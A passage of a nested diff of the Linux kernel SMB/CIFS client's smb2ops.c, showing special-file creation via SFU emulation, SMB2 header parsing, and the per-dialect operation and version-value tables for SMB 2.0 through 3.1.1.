+-	/* TODO: add support for compounds containing READ. */
+-	if (pdu_length > CIFSMaxBufSize + MAX_HEADER_SIZE(server)) {
+-		return receive_encrypted_read(server, &mids[0], num_mids);
+-	}
+-
+-	return receive_encrypted_standard(server, mids, bufs, num_mids);
+-}
+-
+-int
+-smb3_handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+-{
+-	char *buf = server->large_buf ? server->bigbuf : server->smallbuf;
+-
+-	return handle_read_data(server, mid, buf, server->pdu_size,
+-				NULL, 0, 0, false);
+-}
+-
+-static int
+-smb2_next_header(char *buf)
+-{
+-	struct smb2_hdr *hdr = (struct smb2_hdr *)buf;
+-	struct smb2_transform_hdr *t_hdr = (struct smb2_transform_hdr *)buf;
+-
+-	if (hdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM)
+-		return sizeof(struct smb2_transform_hdr) +
+-		  le32_to_cpu(t_hdr->OriginalMessageSize);
+-
+-	return le32_to_cpu(hdr->NextCommand);
+-}
+-
+-static int
+-smb2_make_node(unsigned int xid, struct inode *inode,
+-	       struct dentry *dentry, struct cifs_tcon *tcon,
+-	       const char *full_path, umode_t mode, dev_t dev)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	int rc = -EPERM;
+-	struct cifs_open_info_data buf = {};
+-	struct cifs_io_parms io_parms = {0};
+-	__u32 oplock = 0;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	unsigned int bytes_written;
+-	struct win_dev *pdev;
+-	struct kvec iov[2];
+-
+-	/*
+-	 * Check if mounted with mount parm 'sfu' mount parm.
+-	 * SFU emulation should work with all servers, but only
+-	 * supports block and char device (no socket & fifo),
+-	 * and was used by default in earlier versions of Windows
+-	 */
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL))
+-		return rc;
+-
+-	/*
+-	 * TODO: Add ability to create instead via reparse point. Windows (e.g.
+-	 * their current NFS server) uses this approach to expose special files
+-	 * over SMB2/SMB3 and Samba will do this with SMB3.1.1 POSIX Extensions
+-	 */
+-
+-	if (!S_ISCHR(mode) && !S_ISBLK(mode))
+-		return rc;
+-
+-	cifs_dbg(FYI, "sfu compat create special file\n");
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_WRITE,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						      CREATE_OPTION_SPECIAL),
+-		.disposition = FILE_CREATE,
+-		.path = full_path,
+-		.fid = &fid,
+-	};
+-
+-	if (tcon->ses->server->oplocks)
+-		oplock = REQ_OPLOCK;
+-	else
+-		oplock = 0;
+-	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, &buf);
+-	if (rc)
+-		return rc;
+-
+-	/*
+-	 * BB Do not bother to decode buf since no local inode yet to put
+-	 * timestamps in, but we can reuse it safely.
+-	 */
+-
+-	pdev = (struct win_dev *)&buf.fi;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = sizeof(struct win_dev);
+-	iov[1].iov_base = &buf.fi;
+-	iov[1].iov_len = sizeof(struct win_dev);
+-	if (S_ISCHR(mode)) {
+-		memcpy(pdev->type, "IntxCHR", 8);
+-		pdev->major = cpu_to_le64(MAJOR(dev));
+-		pdev->minor = cpu_to_le64(MINOR(dev));
+-		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
+-							&bytes_written, iov, 1);
+-	} else if (S_ISBLK(mode)) {
+-		memcpy(pdev->type, "IntxBLK", 8);
+-		pdev->major = cpu_to_le64(MAJOR(dev));
+-		pdev->minor = cpu_to_le64(MINOR(dev));
+-		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
+-							&bytes_written, iov, 1);
+-	}
+-	tcon->ses->server->ops->close(xid, tcon, &fid);
+-	d_drop(dentry);
+-
+-	/* FIXME: add code here to set EAs */
+-
+-	cifs_free_open_info(&buf);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-struct smb_version_operations smb20_operations = {
+-	.compare_fids = smb2_compare_fids,
+-	.setup_request = smb2_setup_request,
+-	.setup_async_request = smb2_setup_async_request,
+-	.check_receive = smb2_check_receive,
+-	.add_credits = smb2_add_credits,
+-	.set_credits = smb2_set_credits,
+-	.get_credits_field = smb2_get_credits_field,
+-	.get_credits = smb2_get_credits,
+-	.wait_mtu_credits = cifs_wait_mtu_credits,
+-	.get_next_mid = smb2_get_next_mid,
+-	.revert_current_mid = smb2_revert_current_mid,
+-	.read_data_offset = smb2_read_data_offset,
+-	.read_data_length = smb2_read_data_length,
+-	.map_error = map_smb2_to_linux_error,
+-	.find_mid = smb2_find_mid,
+-	.check_message = smb2_check_message,
+-	.dump_detail = smb2_dump_detail,
+-	.clear_stats = smb2_clear_stats,
+-	.print_stats = smb2_print_stats,
+-	.is_oplock_break = smb2_is_valid_oplock_break,
+-	.handle_cancelled_mid = smb2_handle_cancelled_mid,
+-	.downgrade_oplock = smb2_downgrade_oplock,
+-	.need_neg = smb2_need_neg,
+-	.negotiate = smb2_negotiate,
+-	.negotiate_wsize = smb2_negotiate_wsize,
+-	.negotiate_rsize = smb2_negotiate_rsize,
+-	.sess_setup = SMB2_sess_setup,
+-	.logoff = SMB2_logoff,
+-	.tree_connect = SMB2_tcon,
+-	.tree_disconnect = SMB2_tdis,
+-	.qfs_tcon = smb2_qfs_tcon,
+-	.is_path_accessible = smb2_is_path_accessible,
+-	.can_echo = smb2_can_echo,
+-	.echo = SMB2_echo,
+-	.query_path_info = smb2_query_path_info,
+-	.get_srv_inum = smb2_get_srv_inum,
+-	.query_file_info = smb2_query_file_info,
+-	.set_path_size = smb2_set_path_size,
+-	.set_file_size = smb2_set_file_size,
+-	.set_file_info = smb2_set_file_info,
+-	.set_compression = smb2_set_compression,
+-	.mkdir = smb2_mkdir,
+-	.mkdir_setinfo = smb2_mkdir_setinfo,
+-	.rmdir = smb2_rmdir,
+-	.unlink = smb2_unlink,
+-	.rename = smb2_rename_path,
+-	.create_hardlink = smb2_create_hardlink,
+-	.query_symlink = smb2_query_symlink,
+-	.query_mf_symlink = smb3_query_mf_symlink,
+-	.create_mf_symlink = smb3_create_mf_symlink,
+-	.open = smb2_open_file,
+-	.set_fid = smb2_set_fid,
+-	.close = smb2_close_file,
+-	.flush = smb2_flush_file,
+-	.async_readv = smb2_async_readv,
+-	.async_writev = smb2_async_writev,
+-	.sync_read = smb2_sync_read,
+-	.sync_write = smb2_sync_write,
+-	.query_dir_first = smb2_query_dir_first,
+-	.query_dir_next = smb2_query_dir_next,
+-	.close_dir = smb2_close_dir,
+-	.calc_smb_size = smb2_calc_size,
+-	.is_status_pending = smb2_is_status_pending,
+-	.is_session_expired = smb2_is_session_expired,
+-	.oplock_response = smb2_oplock_response,
+-	.queryfs = smb2_queryfs,
+-	.mand_lock = smb2_mand_lock,
+-	.mand_unlock_range = smb2_unlock_range,
+-	.push_mand_locks = smb2_push_mandatory_locks,
+-	.get_lease_key = smb2_get_lease_key,
+-	.set_lease_key = smb2_set_lease_key,
+-	.new_lease_key = smb2_new_lease_key,
+-	.calc_signature = smb2_calc_signature,
+-	.is_read_op = smb2_is_read_op,
+-	.set_oplock_level = smb2_set_oplock_level,
+-	.create_lease_buf = smb2_create_lease_buf,
+-	.parse_lease_buf = smb2_parse_lease_buf,
+-	.copychunk_range = smb2_copychunk_range,
+-	.wp_retry_size = smb2_wp_retry_size,
+-	.dir_needs_close = smb2_dir_needs_close,
+-	.get_dfs_refer = smb2_get_dfs_refer,
+-	.select_sectype = smb2_select_sectype,
+-#ifdef CONFIG_CIFS_XATTR
+-	.query_all_EAs = smb2_query_eas,
+-	.set_EA = smb2_set_ea,
+-#endif /* CIFS_XATTR */
+-	.get_acl = get_smb2_acl,
+-	.get_acl_by_fid = get_smb2_acl_by_fid,
+-	.set_acl = set_smb2_acl,
+-	.next_header = smb2_next_header,
+-	.ioctl_query_info = smb2_ioctl_query_info,
+-	.make_node = smb2_make_node,
+-	.fiemap = smb3_fiemap,
+-	.llseek = smb3_llseek,
+-	.is_status_io_timeout = smb2_is_status_io_timeout,
+-	.is_network_name_deleted = smb2_is_network_name_deleted,
+-};
+-#endif /* CIFS_ALLOW_INSECURE_LEGACY */
+-
+-struct smb_version_operations smb21_operations = {
+-	.compare_fids = smb2_compare_fids,
+-	.setup_request = smb2_setup_request,
+-	.setup_async_request = smb2_setup_async_request,
+-	.check_receive = smb2_check_receive,
+-	.add_credits = smb2_add_credits,
+-	.set_credits = smb2_set_credits,
+-	.get_credits_field = smb2_get_credits_field,
+-	.get_credits = smb2_get_credits,
+-	.wait_mtu_credits = smb2_wait_mtu_credits,
+-	.adjust_credits = smb2_adjust_credits,
+-	.get_next_mid = smb2_get_next_mid,
+-	.revert_current_mid = smb2_revert_current_mid,
+-	.read_data_offset = smb2_read_data_offset,
+-	.read_data_length = smb2_read_data_length,
+-	.map_error = map_smb2_to_linux_error,
+-	.find_mid = smb2_find_mid,
+-	.check_message = smb2_check_message,
+-	.dump_detail = smb2_dump_detail,
+-	.clear_stats = smb2_clear_stats,
+-	.print_stats = smb2_print_stats,
+-	.is_oplock_break = smb2_is_valid_oplock_break,
+-	.handle_cancelled_mid = smb2_handle_cancelled_mid,
+-	.downgrade_oplock = smb2_downgrade_oplock,
+-	.need_neg = smb2_need_neg,
+-	.negotiate = smb2_negotiate,
+-	.negotiate_wsize = smb2_negotiate_wsize,
+-	.negotiate_rsize = smb2_negotiate_rsize,
+-	.sess_setup = SMB2_sess_setup,
+-	.logoff = SMB2_logoff,
+-	.tree_connect = SMB2_tcon,
+-	.tree_disconnect = SMB2_tdis,
+-	.qfs_tcon = smb2_qfs_tcon,
+-	.is_path_accessible = smb2_is_path_accessible,
+-	.can_echo = smb2_can_echo,
+-	.echo = SMB2_echo,
+-	.query_path_info = smb2_query_path_info,
+-	.get_srv_inum = smb2_get_srv_inum,
+-	.query_file_info = smb2_query_file_info,
+-	.set_path_size = smb2_set_path_size,
+-	.set_file_size = smb2_set_file_size,
+-	.set_file_info = smb2_set_file_info,
+-	.set_compression = smb2_set_compression,
+-	.mkdir = smb2_mkdir,
+-	.mkdir_setinfo = smb2_mkdir_setinfo,
+-	.rmdir = smb2_rmdir,
+-	.unlink = smb2_unlink,
+-	.rename = smb2_rename_path,
+-	.create_hardlink = smb2_create_hardlink,
+-	.query_symlink = smb2_query_symlink,
+-	.query_mf_symlink = smb3_query_mf_symlink,
+-	.create_mf_symlink = smb3_create_mf_symlink,
+-	.open = smb2_open_file,
+-	.set_fid = smb2_set_fid,
+-	.close = smb2_close_file,
+-	.flush = smb2_flush_file,
+-	.async_readv = smb2_async_readv,
+-	.async_writev = smb2_async_writev,
+-	.sync_read = smb2_sync_read,
+-	.sync_write = smb2_sync_write,
+-	.query_dir_first = smb2_query_dir_first,
+-	.query_dir_next = smb2_query_dir_next,
+-	.close_dir = smb2_close_dir,
+-	.calc_smb_size = smb2_calc_size,
+-	.is_status_pending = smb2_is_status_pending,
+-	.is_session_expired = smb2_is_session_expired,
+-	.oplock_response = smb2_oplock_response,
+-	.queryfs = smb2_queryfs,
+-	.mand_lock = smb2_mand_lock,
+-	.mand_unlock_range = smb2_unlock_range,
+-	.push_mand_locks = smb2_push_mandatory_locks,
+-	.get_lease_key = smb2_get_lease_key,
+-	.set_lease_key = smb2_set_lease_key,
+-	.new_lease_key = smb2_new_lease_key,
+-	.calc_signature = smb2_calc_signature,
+-	.is_read_op = smb21_is_read_op,
+-	.set_oplock_level = smb21_set_oplock_level,
+-	.create_lease_buf = smb2_create_lease_buf,
+-	.parse_lease_buf = smb2_parse_lease_buf,
+-	.copychunk_range = smb2_copychunk_range,
+-	.wp_retry_size = smb2_wp_retry_size,
+-	.dir_needs_close = smb2_dir_needs_close,
+-	.enum_snapshots = smb3_enum_snapshots,
+-	.notify = smb3_notify,
+-	.get_dfs_refer = smb2_get_dfs_refer,
+-	.select_sectype = smb2_select_sectype,
+-#ifdef CONFIG_CIFS_XATTR
+-	.query_all_EAs = smb2_query_eas,
+-	.set_EA = smb2_set_ea,
+-#endif /* CIFS_XATTR */
+-	.get_acl = get_smb2_acl,
+-	.get_acl_by_fid = get_smb2_acl_by_fid,
+-	.set_acl = set_smb2_acl,
+-	.next_header = smb2_next_header,
+-	.ioctl_query_info = smb2_ioctl_query_info,
+-	.make_node = smb2_make_node,
+-	.fiemap = smb3_fiemap,
+-	.llseek = smb3_llseek,
+-	.is_status_io_timeout = smb2_is_status_io_timeout,
+-	.is_network_name_deleted = smb2_is_network_name_deleted,
+-};
+-
+-struct smb_version_operations smb30_operations = {
+-	.compare_fids = smb2_compare_fids,
+-	.setup_request = smb2_setup_request,
+-	.setup_async_request = smb2_setup_async_request,
+-	.check_receive = smb2_check_receive,
+-	.add_credits = smb2_add_credits,
+-	.set_credits = smb2_set_credits,
+-	.get_credits_field = smb2_get_credits_field,
+-	.get_credits = smb2_get_credits,
+-	.wait_mtu_credits = smb2_wait_mtu_credits,
+-	.adjust_credits = smb2_adjust_credits,
+-	.get_next_mid = smb2_get_next_mid,
+-	.revert_current_mid = smb2_revert_current_mid,
+-	.read_data_offset = smb2_read_data_offset,
+-	.read_data_length = smb2_read_data_length,
+-	.map_error = map_smb2_to_linux_error,
+-	.find_mid = smb2_find_mid,
+-	.check_message = smb2_check_message,
+-	.dump_detail = smb2_dump_detail,
+-	.clear_stats = smb2_clear_stats,
+-	.print_stats = smb2_print_stats,
+-	.dump_share_caps = smb2_dump_share_caps,
+-	.is_oplock_break = smb2_is_valid_oplock_break,
+-	.handle_cancelled_mid = smb2_handle_cancelled_mid,
+-	.downgrade_oplock = smb3_downgrade_oplock,
+-	.need_neg = smb2_need_neg,
+-	.negotiate = smb2_negotiate,
+-	.negotiate_wsize = smb3_negotiate_wsize,
+-	.negotiate_rsize = smb3_negotiate_rsize,
+-	.sess_setup = SMB2_sess_setup,
+-	.logoff = SMB2_logoff,
+-	.tree_connect = SMB2_tcon,
+-	.tree_disconnect = SMB2_tdis,
+-	.qfs_tcon = smb3_qfs_tcon,
+-	.is_path_accessible = smb2_is_path_accessible,
+-	.can_echo = smb2_can_echo,
+-	.echo = SMB2_echo,
+-	.query_path_info = smb2_query_path_info,
+-	/* WSL tags introduced long after smb2.1, enable for SMB3, 3.11 only */
+-	.query_reparse_tag = smb2_query_reparse_tag,
+-	.get_srv_inum = smb2_get_srv_inum,
+-	.query_file_info = smb2_query_file_info,
+-	.set_path_size = smb2_set_path_size,
+-	.set_file_size = smb2_set_file_size,
+-	.set_file_info = smb2_set_file_info,
+-	.set_compression = smb2_set_compression,
+-	.mkdir = smb2_mkdir,
+-	.mkdir_setinfo = smb2_mkdir_setinfo,
+-	.rmdir = smb2_rmdir,
+-	.unlink = smb2_unlink,
+-	.rename = smb2_rename_path,
+-	.create_hardlink = smb2_create_hardlink,
+-	.query_symlink = smb2_query_symlink,
+-	.query_mf_symlink = smb3_query_mf_symlink,
+-	.create_mf_symlink = smb3_create_mf_symlink,
+-	.open = smb2_open_file,
+-	.set_fid = smb2_set_fid,
+-	.close = smb2_close_file,
+-	.close_getattr = smb2_close_getattr,
+-	.flush = smb2_flush_file,
+-	.async_readv = smb2_async_readv,
+-	.async_writev = smb2_async_writev,
+-	.sync_read = smb2_sync_read,
+-	.sync_write = smb2_sync_write,
+-	.query_dir_first = smb2_query_dir_first,
+-	.query_dir_next = smb2_query_dir_next,
+-	.close_dir = smb2_close_dir,
+-	.calc_smb_size = smb2_calc_size,
+-	.is_status_pending = smb2_is_status_pending,
+-	.is_session_expired = smb2_is_session_expired,
+-	.oplock_response = smb2_oplock_response,
+-	.queryfs = smb2_queryfs,
+-	.mand_lock = smb2_mand_lock,
+-	.mand_unlock_range = smb2_unlock_range,
+-	.push_mand_locks = smb2_push_mandatory_locks,
+-	.get_lease_key = smb2_get_lease_key,
+-	.set_lease_key = smb2_set_lease_key,
+-	.new_lease_key = smb2_new_lease_key,
+-	.generate_signingkey = generate_smb30signingkey,
+-	.calc_signature = smb3_calc_signature,
+-	.set_integrity  = smb3_set_integrity,
+-	.is_read_op = smb21_is_read_op,
+-	.set_oplock_level = smb3_set_oplock_level,
+-	.create_lease_buf = smb3_create_lease_buf,
+-	.parse_lease_buf = smb3_parse_lease_buf,
+-	.copychunk_range = smb2_copychunk_range,
+-	.duplicate_extents = smb2_duplicate_extents,
+-	.validate_negotiate = smb3_validate_negotiate,
+-	.wp_retry_size = smb2_wp_retry_size,
+-	.dir_needs_close = smb2_dir_needs_close,
+-	.fallocate = smb3_fallocate,
+-	.enum_snapshots = smb3_enum_snapshots,
+-	.notify = smb3_notify,
+-	.init_transform_rq = smb3_init_transform_rq,
+-	.is_transform_hdr = smb3_is_transform_hdr,
+-	.receive_transform = smb3_receive_transform,
+-	.get_dfs_refer = smb2_get_dfs_refer,
+-	.select_sectype = smb2_select_sectype,
+-#ifdef CONFIG_CIFS_XATTR
+-	.query_all_EAs = smb2_query_eas,
+-	.set_EA = smb2_set_ea,
+-#endif /* CIFS_XATTR */
+-	.get_acl = get_smb2_acl,
+-	.get_acl_by_fid = get_smb2_acl_by_fid,
+-	.set_acl = set_smb2_acl,
+-	.next_header = smb2_next_header,
+-	.ioctl_query_info = smb2_ioctl_query_info,
+-	.make_node = smb2_make_node,
+-	.fiemap = smb3_fiemap,
+-	.llseek = smb3_llseek,
+-	.is_status_io_timeout = smb2_is_status_io_timeout,
+-	.is_network_name_deleted = smb2_is_network_name_deleted,
+-};
+-
+-struct smb_version_operations smb311_operations = {
+-	.compare_fids = smb2_compare_fids,
+-	.setup_request = smb2_setup_request,
+-	.setup_async_request = smb2_setup_async_request,
+-	.check_receive = smb2_check_receive,
+-	.add_credits = smb2_add_credits,
+-	.set_credits = smb2_set_credits,
+-	.get_credits_field = smb2_get_credits_field,
+-	.get_credits = smb2_get_credits,
+-	.wait_mtu_credits = smb2_wait_mtu_credits,
+-	.adjust_credits = smb2_adjust_credits,
+-	.get_next_mid = smb2_get_next_mid,
+-	.revert_current_mid = smb2_revert_current_mid,
+-	.read_data_offset = smb2_read_data_offset,
+-	.read_data_length = smb2_read_data_length,
+-	.map_error = map_smb2_to_linux_error,
+-	.find_mid = smb2_find_mid,
+-	.check_message = smb2_check_message,
+-	.dump_detail = smb2_dump_detail,
+-	.clear_stats = smb2_clear_stats,
+-	.print_stats = smb2_print_stats,
+-	.dump_share_caps = smb2_dump_share_caps,
+-	.is_oplock_break = smb2_is_valid_oplock_break,
+-	.handle_cancelled_mid = smb2_handle_cancelled_mid,
+-	.downgrade_oplock = smb3_downgrade_oplock,
+-	.need_neg = smb2_need_neg,
+-	.negotiate = smb2_negotiate,
+-	.negotiate_wsize = smb3_negotiate_wsize,
+-	.negotiate_rsize = smb3_negotiate_rsize,
+-	.sess_setup = SMB2_sess_setup,
+-	.logoff = SMB2_logoff,
+-	.tree_connect = SMB2_tcon,
+-	.tree_disconnect = SMB2_tdis,
+-	.qfs_tcon = smb3_qfs_tcon,
+-	.is_path_accessible = smb2_is_path_accessible,
+-	.can_echo = smb2_can_echo,
+-	.echo = SMB2_echo,
+-	.query_path_info = smb2_query_path_info,
+-	.query_reparse_tag = smb2_query_reparse_tag,
+-	.get_srv_inum = smb2_get_srv_inum,
+-	.query_file_info = smb2_query_file_info,
+-	.set_path_size = smb2_set_path_size,
+-	.set_file_size = smb2_set_file_size,
+-	.set_file_info = smb2_set_file_info,
+-	.set_compression = smb2_set_compression,
+-	.mkdir = smb2_mkdir,
+-	.mkdir_setinfo = smb2_mkdir_setinfo,
+-	.posix_mkdir = smb311_posix_mkdir,
+-	.rmdir = smb2_rmdir,
+-	.unlink = smb2_unlink,
+-	.rename = smb2_rename_path,
+-	.create_hardlink = smb2_create_hardlink,
+-	.query_symlink = smb2_query_symlink,
+-	.query_mf_symlink = smb3_query_mf_symlink,
+-	.create_mf_symlink = smb3_create_mf_symlink,
+-	.open = smb2_open_file,
+-	.set_fid = smb2_set_fid,
+-	.close = smb2_close_file,
+-	.close_getattr = smb2_close_getattr,
+-	.flush = smb2_flush_file,
+-	.async_readv = smb2_async_readv,
+-	.async_writev = smb2_async_writev,
+-	.sync_read = smb2_sync_read,
+-	.sync_write = smb2_sync_write,
+-	.query_dir_first = smb2_query_dir_first,
+-	.query_dir_next = smb2_query_dir_next,
+-	.close_dir = smb2_close_dir,
+-	.calc_smb_size = smb2_calc_size,
+-	.is_status_pending = smb2_is_status_pending,
+-	.is_session_expired = smb2_is_session_expired,
+-	.oplock_response = smb2_oplock_response,
+-	.queryfs = smb311_queryfs,
+-	.mand_lock = smb2_mand_lock,
+-	.mand_unlock_range = smb2_unlock_range,
+-	.push_mand_locks = smb2_push_mandatory_locks,
+-	.get_lease_key = smb2_get_lease_key,
+-	.set_lease_key = smb2_set_lease_key,
+-	.new_lease_key = smb2_new_lease_key,
+-	.generate_signingkey = generate_smb311signingkey,
+-	.calc_signature = smb3_calc_signature,
+-	.set_integrity  = smb3_set_integrity,
+-	.is_read_op = smb21_is_read_op,
+-	.set_oplock_level = smb3_set_oplock_level,
+-	.create_lease_buf = smb3_create_lease_buf,
+-	.parse_lease_buf = smb3_parse_lease_buf,
+-	.copychunk_range = smb2_copychunk_range,
+-	.duplicate_extents = smb2_duplicate_extents,
+-/*	.validate_negotiate = smb3_validate_negotiate, */ /* not used in 3.11 */
+-	.wp_retry_size = smb2_wp_retry_size,
+-	.dir_needs_close = smb2_dir_needs_close,
+-	.fallocate = smb3_fallocate,
+-	.enum_snapshots = smb3_enum_snapshots,
+-	.notify = smb3_notify,
+-	.init_transform_rq = smb3_init_transform_rq,
+-	.is_transform_hdr = smb3_is_transform_hdr,
+-	.receive_transform = smb3_receive_transform,
+-	.get_dfs_refer = smb2_get_dfs_refer,
+-	.select_sectype = smb2_select_sectype,
+-#ifdef CONFIG_CIFS_XATTR
+-	.query_all_EAs = smb2_query_eas,
+-	.set_EA = smb2_set_ea,
+-#endif /* CIFS_XATTR */
+-	.get_acl = get_smb2_acl,
+-	.get_acl_by_fid = get_smb2_acl_by_fid,
+-	.set_acl = set_smb2_acl,
+-	.next_header = smb2_next_header,
+-	.ioctl_query_info = smb2_ioctl_query_info,
+-	.make_node = smb2_make_node,
+-	.fiemap = smb3_fiemap,
+-	.llseek = smb3_llseek,
+-	.is_status_io_timeout = smb2_is_status_io_timeout,
+-	.is_network_name_deleted = smb2_is_network_name_deleted,
+-};
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-struct smb_version_values smb20_values = {
+-	.version_string = SMB20_VERSION_STRING,
+-	.protocol_id = SMB20_PROT_ID,
+-	.req_capabilities = 0, /* MBZ */
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease),
+-};
+-#endif /* ALLOW_INSECURE_LEGACY */
+-
+-struct smb_version_values smb21_values = {
+-	.version_string = SMB21_VERSION_STRING,
+-	.protocol_id = SMB21_PROT_ID,
+-	.req_capabilities = 0, /* MBZ on negotiate req until SMB3 dialect */
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease),
+-};
+-
+-struct smb_version_values smb3any_values = {
+-	.version_string = SMB3ANY_VERSION_STRING,
+-	.protocol_id = SMB302_PROT_ID, /* doesn't matter, send protocol array */
+-	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-};
+-
+-struct smb_version_values smbdefault_values = {
+-	.version_string = SMBDEFAULT_VERSION_STRING,
+-	.protocol_id = SMB302_PROT_ID, /* doesn't matter, send protocol array */
+-	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-};
+-
+-struct smb_version_values smb30_values = {
+-	.version_string = SMB30_VERSION_STRING,
+-	.protocol_id = SMB30_PROT_ID,
+-	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-};
+-
+-struct smb_version_values smb302_values = {
+-	.version_string = SMB302_VERSION_STRING,
+-	.protocol_id = SMB302_PROT_ID,
+-	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
